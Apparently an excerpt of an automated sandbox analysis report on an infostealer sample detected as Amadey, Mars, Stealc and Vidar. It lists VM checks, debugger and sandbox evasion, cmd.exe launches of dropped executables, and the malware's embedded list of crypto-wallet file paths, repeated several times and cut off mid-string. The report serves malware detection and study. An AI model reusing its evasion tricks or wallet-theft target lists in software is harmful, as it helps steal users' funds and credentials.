Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: EBAEBFII.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: EBAEBFII.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.15.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.15.dr Binary or memory string: vmci.syshbin
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: JDGCFBAFBF.exe, 00000011.00000003.1457618030.00000000007B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.15.dr Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.15.dr Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.15.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.15.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: EBAEBFII.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.15.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VBoxService.exe
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: EBAEBFII.0.dr Binary or memory string: dev.azure.comVMware20,11696492231j
Source: EBAEBFII.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.15.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VMWare
Source: Amcache.hve.15.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: EBAEBFII.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: file.exe, file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1433619231.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Code function: 17_2_04AC07E0 rdtsc 17_2_04AC07E0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CE05FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6CE05FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDA3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CDA3480
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_00A1643B mov eax, dword ptr fs:[00000030h] 19_2_00A1643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_00A1A1A2 mov eax, dword ptr fs:[00000030h] 19_2_00A1A1A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDDB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CDDB66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDDB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CDDB1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIJJDGDHDG.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe "C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDDB341 cpuid 0_2_6CDDB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CDA35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6CDA35A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 19_2_009E6590 LookupAccountNameA, 19_2_009E6590
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.15.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 25.2.explorti.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.explorti.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.explorti.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.explorti.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.JDGCFBAFBF.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.2682883781.00000000009E1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.1434730424.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1481277906.0000000000E11000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2642592451.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2038395246.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2078738506.00000000009E1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3709105416.00000000009E1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.3242863532.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3283992897.00000000009E1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.1478211877.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1433619231.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1436568097.0000000001B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2340, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1433619231.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2340, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1436568097.0000000001B00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo 